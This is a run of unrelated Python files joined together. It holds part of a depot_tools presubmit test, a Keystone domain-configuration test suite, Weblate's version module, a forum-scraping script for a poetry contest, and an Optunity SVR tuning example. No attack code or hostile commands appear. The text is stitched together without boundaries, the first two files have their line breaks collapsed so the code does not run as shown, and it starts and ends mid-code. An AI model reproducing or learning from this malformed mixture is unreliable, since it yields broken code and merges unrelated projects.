CommHelper(input_api, ['allo', 
'--verbose'], cwd=self.fake_root_dir) cmd = ['bar.py', '--verbose'] if input_api.platform == 'win32': cmd.insert(0, input_api.python_executable) CommHelper(input_api, cmd, cwd=self.fake_root_dir, ret=(('', None), 1)) self.mox.ReplayAll() results = presubmit_canned_checks.RunUnitTests( input_api, presubmit.OutputApi, unit_tests) self.assertEqual(2, len(results)) self.assertEqual( presubmit.OutputApi.PresubmitNotifyResult, results[0].__class__) self.assertEqual( presubmit.OutputApi.PresubmitPromptWarning, results[1].__class__) self.checkstdout('') def testCannedRunUnitTestsInDirectory(self): change = presubmit.Change( 'foo1', 'description1', self.fake_root_dir, None, 0, 0, None) input_api = self.MockInputApi(change, False) input_api.verbose = True input_api.logging = self.mox.CreateMock(logging) input_api.PresubmitLocalPath().AndReturn(self.fake_root_dir) input_api.PresubmitLocalPath().AndReturn(self.fake_root_dir) path = presubmit.os.path.join(self.fake_root_dir, 'random_directory') input_api.os_listdir(path).AndReturn(['.', '..', 'a', 'b', 'c']) input_api.os_path.isfile = lambda x: not x.endswith('.') CommHelper( input_api, [presubmit.os.path.join('random_directory', 'b'), '--verbose'], cwd=self.fake_root_dir) input_api.logging.debug('Found 5 files, running 1') self.mox.ReplayAll() results = presubmit_canned_checks.RunUnitTestsInDirectory( input_api, presubmit.OutputApi, 'random_directory', whitelist=['^a$', '^b$'], blacklist=['a']) self.assertEqual(1, len(results)) self.assertEqual( presubmit.OutputApi.PresubmitNotifyResult, results[0].__class__) self.checkstdout('') def testPanProjectChecks(self): # Make sure it accepts both list and tuples. change = presubmit.Change( 'foo1', 'description1', self.fake_root_dir, None, 0, 0, None) input_api = self.MockInputApi(change, False) affected_file = self.mox.CreateMock(presubmit.SvnAffectedFile) for _ in range(3): input_api.AffectedFiles(file_filter=mox.IgnoreArg(), include_deletes=False ).AndReturn([affected_file]) affected_file.LocalPath() affected_file.NewContents().AndReturn('Hey!\nHo!\nHey!\nHo!\n\n') affected_file.ChangedContents().AndReturn([ (0, 'Hey!\n'), (1, 'Ho!\n'), (2, 'Hey!\n'), (3, 'Ho!\n'), (4, '\n')]) for _ in range(5): affected_file.LocalPath().AndReturn('hello.py') input_api.AffectedSourceFiles(mox.IgnoreArg()).AndReturn([affected_file]) input_api.ReadFile(affected_file).AndReturn('Hey!\nHo!\nHey!\nHo!\n\n') self.mox.ReplayAll() results = presubmit_canned_checks.PanProjectChecks( input_api, presubmit.OutputApi, excluded_paths=None, text_files=None, license_header=None, project_name=None, owners_check=False) self.assertEqual(1, len(results)) self.assertEqual( 'Found line ending with white spaces in:', results[0]._message) self.checkstdout('') if __name__ == '__main__': import unittest unittest.main()
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy import uuid import fixtures import mock from testtools import matchers import keystone.conf from keystone import exception from keystone.tests import unit from keystone.tests.unit.ksfixtures import database CONF = keystone.conf.CONF class TestResourceManagerNoFixtures(unit.SQLDriverOverrides, unit.TestCase): def setUp(self): super(TestResourceManagerNoFixtures, self).setUp() self.useFixture(database.Database(self.sql_driver_version_overrides)) self.load_backends() def test_ensure_default_domain_exists(self): # When there's no default domain, ensure_default_domain_exists creates # it. # First make sure there's no default domain. self.assertRaises( exception.DomainNotFound, self.resource_api.get_domain, CONF.identity.default_domain_id) self.resource_api.ensure_default_domain_exists() default_domain = self.resource_api.get_domain( CONF.identity.default_domain_id) expected_domain = { 'id': CONF.identity.default_domain_id, 'name': 'Default', 'enabled': True, 'description': 'Domain created automatically to support V2.0 ' 'operations.', } self.assertEqual(expected_domain, default_domain) def test_ensure_default_domain_exists_already_exists(self): # When there's already a default domain, ensure_default_domain_exists # doesn't do anything. name = uuid.uuid4().hex description = uuid.uuid4().hex domain_attrs = { 'id': CONF.identity.default_domain_id, 'name': name, 'description': description, } self.resource_api.create_domain(CONF.identity.default_domain_id, domain_attrs) self.resource_api.ensure_default_domain_exists() default_domain = self.resource_api.get_domain( CONF.identity.default_domain_id) expected_domain = { 'id': CONF.identity.default_domain_id, 'name': name, 'enabled': True, 'description': description, } self.assertEqual(expected_domain, default_domain) def test_ensure_default_domain_exists_fails(self): # When there's an unexpected exception creating domain it's passed on. 
self.useFixture(fixtures.MockPatchObject( self.resource_api, 'create_domain', side_effect=exception.UnexpectedError)) self.assertRaises(exception.UnexpectedError, self.resource_api.ensure_default_domain_exists) def test_update_project_name_conflict(self): name = uuid.uuid4().hex description = uuid.uuid4().hex domain_attrs = { 'id': CONF.identity.default_domain_id, 'name': name, 'description': description, } domain = self.resource_api.create_domain( CONF.identity.default_domain_id, domain_attrs) project1 = unit.new_project_ref(domain_id=domain['id'], name=uuid.uuid4().hex) self.resource_api.create_project(project1['id'], project1) project2 = unit.new_project_ref(domain_id=domain['id'], name=uuid.uuid4().hex) project = self.resource_api.create_project(project2['id'], project2) self.assertRaises(exception.Conflict, self.resource_api.update_project, project['id'], {'name': project1['name']}) class DomainConfigDriverTests(object): def _domain_config_crud(self, sensitive): domain = uuid.uuid4().hex group = uuid.uuid4().hex option = uuid.uuid4().hex value = uuid.uuid4().hex config = {'group': group, 'option': option, 'value': value, 'sensitive': sensitive} self.driver.create_config_options(domain, [config]) res = self.driver.get_config_option( domain, group, option, sensitive) config.pop('sensitive') self.assertEqual(config, res) value = uuid.uuid4().hex config = {'group': group, 'option': option, 'value': value, 'sensitive': sensitive} self.driver.update_config_options(domain, [config]) res = self.driver.get_config_option( domain, group, option, sensitive) config.pop('sensitive') self.assertEqual(config, res) self.driver.delete_config_options(domain, group, option) self.assertRaises(exception.DomainConfigNotFound, self.driver.get_config_option, domain, group, option, sensitive) # ...and silent if we try to delete it again self.driver.delete_config_options(domain, group, option) def test_whitelisted_domain_config_crud(self): self._domain_config_crud(sensitive=False) def test_sensitive_domain_config_crud(self): self._domain_config_crud(sensitive=True) def _list_domain_config(self, sensitive): """Test listing by combination of domain, group & option.""" config1 = {'group': uuid.uuid4().hex, 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} # Put config2 in the same group as config1 config2 = {'group': config1['group'], 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} config3 = {'group': uuid.uuid4().hex, 'option': uuid.uuid4().hex, 'value': 100, 'sensitive': sensitive} domain = uuid.uuid4().hex self.driver.create_config_options( domain, [config1, config2, config3]) for config in [config1, config2, config3]: config.pop('sensitive') # Try listing all items from a domain res = self.driver.list_config_options( domain, sensitive=sensitive) self.assertThat(res, matchers.HasLength(3)) for res_entry in res: self.assertIn(res_entry, [config1, config2, config3]) # Try listing by domain and group res = self.driver.list_config_options( domain, group=config1['group'], sensitive=sensitive) self.assertThat(res, matchers.HasLength(2)) for res_entry in res: self.assertIn(res_entry, [config1, config2]) # Try listing by domain, group and option res = self.driver.list_config_options( domain, group=config2['group'], option=config2['option'], sensitive=sensitive) self.assertThat(res, matchers.HasLength(1)) self.assertEqual(config2, res[0]) def test_list_whitelisted_domain_config_crud(self): self._list_domain_config(False) def 
test_list_sensitive_domain_config_crud(self): self._list_domain_config(True) def _delete_domain_configs(self, sensitive): """Test deleting by combination of domain, group & option.""" config1 = {'group': uuid.uuid4().hex, 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} # Put config2 and config3 in the same group as config1 config2 = {'group': config1['group'], 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} config3 = {'group': config1['group'], 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} config4 = {'group': uuid.uuid4().hex, 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} domain = uuid.uuid4().hex self.driver.create_config_options( domain, [config1, config2, config3, config4]) for config in [config1, config2, config3, config4]: config.pop('sensitive') # Try deleting by domain, group and option res = self.driver.delete_config_options( domain, group=config2['group'], option=config2['option']) res = self.driver.list_config_options(domain, sensitive=sensitive) self.assertThat(res, matchers.HasLength(3)) for res_entry in res: self.assertIn(res_entry, [config1, config3, config4]) # Try deleting by domain and group res = self.driver.delete_config_options(domain, group=config4['group']) res = self.driver.list_config_options(domain, sensitive=sensitive) self.assertThat(res, matchers.HasLength(2)) for res_entry in res: self.assertIn(res_entry, [config1, config3]) # Try deleting all items from a domain res = self.driver.delete_config_options(domain) res = self.driver.list_config_options(domain, sensitive=sensitive) self.assertThat(res, matchers.HasLength(0)) def test_delete_whitelisted_domain_configs(self): self._delete_domain_configs(False) def test_delete_sensitive_domain_configs(self): self._delete_domain_configs(True) def _create_domain_config_twice(self, sensitive): """Test create the same option twice just overwrites.""" config = {'group': uuid.uuid4().hex, 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} domain = uuid.uuid4().hex self.driver.create_config_options(domain, [config]) config['value'] = uuid.uuid4().hex self.driver.create_config_options(domain, [config]) res = self.driver.get_config_option( domain, config['group'], config['option'], sensitive) config.pop('sensitive') self.assertEqual(config, res) def test_create_whitelisted_domain_config_twice(self): self._create_domain_config_twice(False) def test_create_sensitive_domain_config_twice(self): self._create_domain_config_twice(True) class DomainConfigTests(object): def setUp(self): self.domain = unit.new_domain_ref() self.resource_api.create_domain(self.domain['id'], self.domain) self.addCleanup(self.clean_up_domain) def clean_up_domain(self): # NOTE(henry-nash): Deleting the domain will also delete any domain # configs for this domain. self.domain['enabled'] = False self.resource_api.update_domain(self.domain['id'], self.domain) self.resource_api.delete_domain(self.domain['id']) del self.domain def test_create_domain_config_including_sensitive_option(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) # password is sensitive, so check that the whitelisted portion and # the sensitive piece have been stored in the appropriate locations. 
res = self.domain_config_api.get_config(self.domain['id']) config_whitelisted = copy.deepcopy(config) config_whitelisted['ldap'].pop('password') self.assertEqual(config_whitelisted, res) res = self.domain_config_api.driver.get_config_option( self.domain['id'], 'ldap', 'password', sensitive=True) self.assertEqual(config['ldap']['password'], res['value']) # Finally, use the non-public API to get back the whole config res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual(config, res) def test_get_partial_domain_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) res = self.domain_config_api.get_config(self.domain['id'], group='identity') config_partial = copy.deepcopy(config) config_partial.pop('ldap') self.assertEqual(config_partial, res) res = self.domain_config_api.get_config( self.domain['id'], group='ldap', option='user_tree_dn') self.assertEqual({'user_tree_dn': config['ldap']['user_tree_dn']}, res) # ...but we should fail to get a sensitive option self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.get_config, self.domain['id'], group='ldap', option='password') def test_delete_partial_domain_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) self.domain_config_api.delete_config( self.domain['id'], group='identity') config_partial = copy.deepcopy(config) config_partial.pop('identity') config_partial['ldap'].pop('password') res = self.domain_config_api.get_config(self.domain['id']) self.assertEqual(config_partial, res) self.domain_config_api.delete_config( self.domain['id'], group='ldap', option='url') config_partial = copy.deepcopy(config_partial) config_partial['ldap'].pop('url') res = self.domain_config_api.get_config(self.domain['id']) self.assertEqual(config_partial, res) def test_get_options_not_in_domain_config(self): self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.get_config, self.domain['id']) config = {'ldap': {'url': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.get_config, self.domain['id'], group='identity') self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.get_config, self.domain['id'], group='ldap', option='user_tree_dn') def test_get_sensitive_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual({}, res) self.domain_config_api.create_config(self.domain['id'], config) res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual(config, res) def test_update_partial_domain_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) # Try updating a group new_config = {'ldap': {'url': uuid.uuid4().hex, 'user_filter': uuid.uuid4().hex}} res = self.domain_config_api.update_config( self.domain['id'], 
new_config, group='ldap') expected_config = copy.deepcopy(config) expected_config['ldap']['url'] = new_config['ldap']['url'] expected_config['ldap']['user_filter'] = ( new_config['ldap']['user_filter']) expected_full_config = copy.deepcopy(expected_config) expected_config['ldap'].pop('password') res = self.domain_config_api.get_config(self.domain['id']) self.assertEqual(expected_config, res) # The sensitive option should still exist res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual(expected_full_config, res) # Try updating a single whitelisted option self.domain_config_api.delete_config(self.domain['id']) self.domain_config_api.create_config(self.domain['id'], config) new_config = {'url': uuid.uuid4().hex} res = self.domain_config_api.update_config( self.domain['id'], new_config, group='ldap', option='url') # Make sure whitelisted and full config is updated expected_whitelisted_config = copy.deepcopy(config) expected_whitelisted_config['ldap']['url'] = new_config['url'] expected_full_config = copy.deepcopy(expected_whitelisted_config) expected_whitelisted_config['ldap'].pop('password') self.assertEqual(expected_whitelisted_config, res) res = self.domain_config_api.get_config(self.domain['id']) self.assertEqual(expected_whitelisted_config, res) res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual(expected_full_config, res) # Try updating a single sensitive option self.domain_config_api.delete_config(self.domain['id']) self.domain_config_api.create_config(self.domain['id'], config) new_config = {'password': uuid.uuid4().hex} res = self.domain_config_api.update_config( self.domain['id'], new_config, group='ldap', option='password') # The whitelisted config should not have changed... expected_whitelisted_config = copy.deepcopy(config) expected_full_config = copy.deepcopy(config) expected_whitelisted_config['ldap'].pop('password') self.assertEqual(expected_whitelisted_config, res) res = self.domain_config_api.get_config(self.domain['id']) self.assertEqual(expected_whitelisted_config, res) expected_full_config['ldap']['password'] = new_config['password'] res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) # ...but the sensitive piece should have. 
self.assertEqual(expected_full_config, res) def test_update_invalid_partial_domain_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} # An extra group, when specifying one group should fail self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config, group='ldap') # An extra option, when specifying one option should fail self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config['ldap'], group='ldap', option='url') # Now try the right number of groups/options, but just not # ones that are in the config provided config = {'ldap': {'user_tree_dn': uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config, group='identity') self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config['ldap'], group='ldap', option='url') # Now some valid groups/options, but just not ones that are in the # existing config config = {'ldap': {'user_tree_dn': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) config_wrong_group = {'identity': {'driver': uuid.uuid4().hex}} self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.update_config, self.domain['id'], config_wrong_group, group='identity') config_wrong_option = {'url': uuid.uuid4().hex} self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.update_config, self.domain['id'], config_wrong_option, group='ldap', option='url') # And finally just some bad groups/options bad_group = uuid.uuid4().hex config = {bad_group: {'user': uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config, group=bad_group, option='user') bad_option = uuid.uuid4().hex config = {'ldap': {bad_option: uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config, group='ldap', option=bad_option) def test_create_invalid_domain_config(self): self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.create_config, self.domain['id'], {}) config = {uuid.uuid4().hex: uuid.uuid4().hex} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.create_config, self.domain['id'], config) config = {uuid.uuid4().hex: {uuid.uuid4().hex: uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.create_config, self.domain['id'], config) config = {'ldap': {uuid.uuid4().hex: uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.create_config, self.domain['id'], config) # Try an option that IS in the standard conf, but neither whitelisted # or marked as sensitive config = {'identity': {'user_tree_dn': uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.create_config, self.domain['id'], config) def test_delete_invalid_partial_domain_config(self): config = {'ldap': {'url': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) # Try deleting a group not in the config self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.delete_config, self.domain['id'], group='identity') # Try deleting an option not in the config self.assertRaises(exception.DomainConfigNotFound, 
self.domain_config_api.delete_config, self.domain['id'], group='ldap', option='user_tree_dn') def test_sensitive_substitution_in_domain_config(self): # Create a config that contains a whitelisted option that requires # substitution of a sensitive option. config = {'ldap': {'url': 'my_url/%(password)s', 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) # Read back the config with the internal method and ensure that the # substitution has taken place. res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) expected_url = ( config['ldap']['url'] % {'password': config['ldap']['password']}) self.assertEqual(expected_url, res['ldap']['url']) def test_invalid_sensitive_substitution_in_domain_config(self): """Check that invalid substitutions raise warnings.""" mock_log = mock.Mock() invalid_option_config = { 'ldap': {'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} for invalid_option in ['my_url/%(passssword)s', 'my_url/%(password', 'my_url/%(password)', 'my_url/%(password)d']: invalid_option_config['ldap']['url'] = invalid_option self.domain_config_api.create_config( self.domain['id'], invalid_option_config) with mock.patch('keystone.resource.core.LOG', mock_log): res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) mock_log.warning.assert_any_call(mock.ANY) self.assertEqual( invalid_option_config['ldap']['url'], res['ldap']['url']) def test_escaped_sequence_in_domain_config(self): """Check that escaped '%(' doesn't get interpreted.""" mock_log = mock.Mock() escaped_option_config = { 'ldap': {'url': 'my_url/%%(password)s', 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config( self.domain['id'], escaped_option_config) with mock.patch('keystone.resource.core.LOG', mock_log): res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertFalse(mock_log.warn.called) # The escaping '%' should have been removed self.assertEqual('my_url/%(password)s', res['ldap']['url']) @unit.skip_if_cache_disabled('domain_config') def test_cache_layer_get_sensitive_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) # cache the result res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual(config, res) # delete, bypassing domain config manager api self.domain_config_api.delete_config_options(self.domain['id']) self.assertDictEqual( res, self.domain_config_api.get_config_with_sensitive_info( self.domain['id'])) self.domain_config_api.get_config_with_sensitive_info.invalidate( self.domain_config_api, self.domain['id']) self.assertDictEqual( {}, self.domain_config_api.get_config_with_sensitive_info( self.domain['id'])) def test_delete_domain_deletes_configs(self): """Test domain deletion clears the domain configs.""" domain = unit.new_domain_ref() self.resource_api.create_domain(domain['id'], domain) config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}} self.domain_config_api.create_config(domain['id'], config) # Now delete the domain domain['enabled'] = False self.resource_api.update_domain(domain['id'], 
domain) self.resource_api.delete_domain(domain['id']) # Check domain configs have also been deleted self.assertRaises( exception.DomainConfigNotFound, self.domain_config_api.get_config, domain['id']) # The get_config_with_sensitive_info does not throw an exception if # the config is empty, it just returns an empty dict self.assertDictEqual( {}, self.domain_config_api.get_config_with_sensitive_info( domain['id'])) def test_config_registration(self): type = uuid.uuid4().hex self.domain_config_api.obtain_registration( self.domain['id'], type) self.domain_config_api.release_registration( self.domain['id'], type=type) # Make sure that once someone has it, nobody else can get it. # This includes the domain who already has it. self.domain_config_api.obtain_registration( self.domain['id'], type) self.assertFalse( self.domain_config_api.obtain_registration( self.domain['id'], type)) # Make sure we can read who does have it self.assertEqual( self.domain['id'], self.domain_config_api.read_registration(type)) # Make sure releasing it is silent if the domain specified doesn't # have the registration domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex} self.resource_api.create_domain(domain2['id'], domain2) self.domain_config_api.release_registration( domain2['id'], type=type) # If nobody has the type registered, then trying to read it should # raise ConfigRegistrationNotFound self.domain_config_api.release_registration( self.domain['id'], type=type) self.assertRaises(exception.ConfigRegistrationNotFound, self.domain_config_api.read_registration, type) # Finally check multiple registrations are cleared if you free the # registration without specifying the type type2 = uuid.uuid4().hex self.domain_config_api.obtain_registration( self.domain['id'], type) self.domain_config_api.obtain_registration( self.domain['id'], type2) self.domain_config_api.release_registration(self.domain['id']) self.assertRaises(exception.ConfigRegistrationNotFound, self.domain_config_api.read_registration, type) self.assertRaises(exception.ConfigRegistrationNotFound, self.domain_config_api.read_registration, type2)
#
# Copyright © 2012 - 2021 Michal Čihař <[email protected]>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#

import os
from collections import namedtuple

from weblate.vcs.base import RepositoryException
from weblate.vcs.git import GitRepository

# This has to stay here for compatibility reasons - it is stored pickled in
# the cache and moving it around breaks upgrades.
Release = namedtuple("Release", ["version", "timestamp"])


def get_root_dir():
    """Return Weblate root dir."""
    curdir = os.path.dirname(os.path.abspath(__file__))
    return os.path.abspath(os.path.join(curdir, "..", ".."))


# Weblate version
VERSION = "4.5.2-dev"

# Version string without suffix
VERSION_BASE = VERSION.replace("-dev", "")

# User-Agent string to use
USER_AGENT = f"Weblate/{VERSION}"

# Git tag name for this release
TAG_NAME = f"weblate-{VERSION_BASE}"

# Grab some information from git
try:
    # Describe current checkout
    GIT_REPO = GitRepository(get_root_dir(), local=True)
    GIT_VERSION = GIT_REPO.describe()
    GIT_REVISION = GIT_REPO.last_revision
    del GIT_REPO
except (RepositoryException, OSError):
    # Import failed or git has troubles reading
    # repo (for example shallow clone)
    GIT_VERSION = VERSION
    GIT_REVISION = None
# Script to automatically create the text of the weekly post for the "poetry running contest" on the mtgsalvation forums.

# using beautifulsoup4 (4.3.2) for this script
from bs4 import BeautifulSoup
from datetime import date, timedelta, datetime
import urllib2
import argparse
import sys
import re

from PRC_Forum_Tools import PRCForumTools


class PRCNewRoundPost(PRCForumTools):

    def __init__(self):
        self.days, self.pages, self.output = self.parse_parameters()
        super(PRCNewRoundPost, self).__init__()
        print "Gathering Posts from up to < " + str(self.days.days) + " > days ago."
        print "Searching through last < " + str(self.pages) + " > pages of thread."
        print "Outputting post text to file: < " + self.output + " >"

    def parse_parameters(self):
        """
        Script can accept the parameters:
            -w <num> --weeks <num>    posts less than <num> weeks old will be used
            -p <num> --pages <num>    posts from <num> thread pages back will be considered
            -o <str> --output <str>   post text output will be written to file <str>
        The number of weeks is returned as a number of days by multiplying it by 7.
        """
        parser = argparse.ArgumentParser()
        parser.add_argument("-w", "--weeks", type=int, default=1, choices=[1,2,3], help="Pull posts from <num> weeks back")
        parser.add_argument("-p", "--pages", type=int, default=2, choices=[1,2,3], help="Search <num> pages back in the thread for valid posts")
        parser.add_argument("-o", "--output", type=str, default="PRC_Post.txt", help="Write post output to <file> indicated here")
        args = parser.parse_args()
        return timedelta(days=args.weeks * 7), args.pages, args.output

    def get_thread_pages(self):
        """
        Extracts the page link numbers from the thread.
        Use the page link numbers to determine the page number of the final thread page.
        If the user has requested searching more pages than the thread is long (through the -p or --pages parameter)
        then self.pages is just set to the length of the thread.
        Returns an array of links to the thread pages to search through.
        """
        soup = self.get_url_contents(self.submission_thread_url)
        page_links = soup.find('ul', 'b-pagination-list').findAll('a', 'b-pagination-item')
        final_page_number = int(page_links[-1].contents[0])
        if self.pages >= final_page_number:
            print "Thread does not contain " + str(self.pages) + " pages. Will perform search on all " + str(final_page_number) + " pages of the thread instead."
            self.pages = final_page_number
        return [(self.submission_thread_url + '?page=' + str(index)) for index in range(final_page_number + 1 - self.pages, final_page_number + 1)]

    def get_and_format_post_links(self, thread_pages):
        """
        post_links is the array that will hold the links to posts (formatted as:
            '[URL="' + post_link + '"]' + post_title + '[/URL] by ' + poster_name + '\n')
        to be used for the new round post.
        present is a datetime object representing the current time. This will be compared with post dates
        to determine whether to add a formatted link to that post to post_links.
        thread_pages is an array of links to the thread pages to search for posts.
        Search through each page in thread_pages for potential posts to add to post_links.
        For each post on each page, attempt to get the post's date; this step might fail due to the issue described here:
            The site recently changed something... now there is some extra html for ads or something which is collected
            along with the valid posts. Without the try/except statement these cause error messages such as:
                "TypeError: 'NoneType' object has no attribute '__getitem__'"
            When it is failing, this is the contents of post:
                <li class="p-comments p-comments-b"><section class="ad-container"><div class="ad-bin"><div class="ad-placement"></div></div></section></li>
            The "thread_posts = soup.findAll('li', 'p-comments', 'p-comments-b')" line needs to change to somehow not grab those lines as posts.
        If the post date is figured out successfully, make sure the post is recent enough to use, then get all the parts
        necessary for creating the formatted post link, then append to post_links.
        Returns post_links array.
        """
        post_links = []
        present = datetime.now()
        for page in thread_pages:
            soup = self.get_url_contents(page)
            thread_posts = soup.findAll('li', 'p-comments', 'p-comments-b')
            for post in thread_posts:
                try:
                    post_date = self.get_post_date(post)
                except:
                    continue
                if post_date >= (present - self.days):
                    post_link = self.get_post_link(post)
                    poster_name = self.get_poster_name(post)
                    post_title = self.get_post_title(post)
                    post_links.append('[URL="' + post_link + '"]' + post_title + '[/URL] by ' + poster_name + '\n')
        return post_links

    def write_post_to_file(self, post_links):
        """
        Writing the post to a text file is for debugging purposes.
        Import the strings first_post_section and final_post_section from prc_script_vars.py.
        These are in a separate file because they are ugly and should be kept hidden.
        post_links is an array of all the formatted links to the submitted poems.
        The text to post will be written out to file self.output (defaults to "PRC_Post.txt").
        The text is written to the output file in this order: first_post_section, post_links, final_post_section.
        If some I/O error happens, it is written to std output.
        """
        from prc_script_vars import first_post_section, final_post_section
        post_text = first_post_section + "".join(post_links).encode('utf8') + final_post_section
        post_text = unicode(post_text, errors="ignore")
        self.write_post_to_output(post_text)
        return post_text

    def main(self):
        """
        Runs PRCNewRoundPost class functions to create the text to post for the new PRC round.
        """
        thread_pages = self.get_thread_pages()
        post_links = self.get_and_format_post_links(thread_pages)
        post_text = self.write_post_to_file(post_links)
        #print post_text
        #post_text = self.get_post_text()
        #post_text = unicode(post_text, errors="ignore")
        #print post_text
        self.create_and_submit_new_round_post(post_text)


if __name__ == "__main__":
    run_script = PRCNewRoundPost()
    run_script.main()
# Example of tuning an SVR model in scikit-learn with Optunity
# This example requires sklearn

import math
import itertools
import optunity
import optunity.metrics
import sklearn.svm
import matplotlib.pylab as plt
import time

# CREATE THE TRAINING SET
from sklearn.datasets import load_diabetes
diabetes = load_diabetes()
n = diabetes.data.shape[0]

data = diabetes.data
targets = diabetes.target

# we will use nested 3-fold cross-validation
# in the outer cross-validation procedure
# we make the decorator explicitly so we can reuse the same folds
# in both tuned and untuned approaches
outer_cv = optunity.cross_validated(x=data, y=targets, num_folds=3)


# compute the mean squared error of a model with default parameters
def compute_mse_standard(x_train, y_train, x_test, y_test):
    model = sklearn.svm.SVR().fit(x_train, y_train)
    predictions = model.predict(x_test)
    return optunity.metrics.mse(y_test, predictions)


# decorate with cross-validation
compute_mse_standard = outer_cv(compute_mse_standard)
mse_standard = compute_mse_standard()
print('Nested cv mean squared error of non-tuned model: ' + str(mse_standard))


# compute the mean squared error of a model with tuned parameters
# we use 2x5 fold cross-validation while tuning
def compute_mse_tuned(x_train, y_train, x_test, y_test):

    # define objective function
    @optunity.cross_validated(x=x_train, y=y_train, num_iter=2, num_folds=5)
    def tune_cv(x_train, y_train, x_test, y_test, C, gamma):
        model = sklearn.svm.SVR(C=C, gamma=gamma).fit(x_train, y_train)
        predictions = model.predict(x_test)
        return optunity.metrics.mse(y_test, predictions)

    # optimize parameters
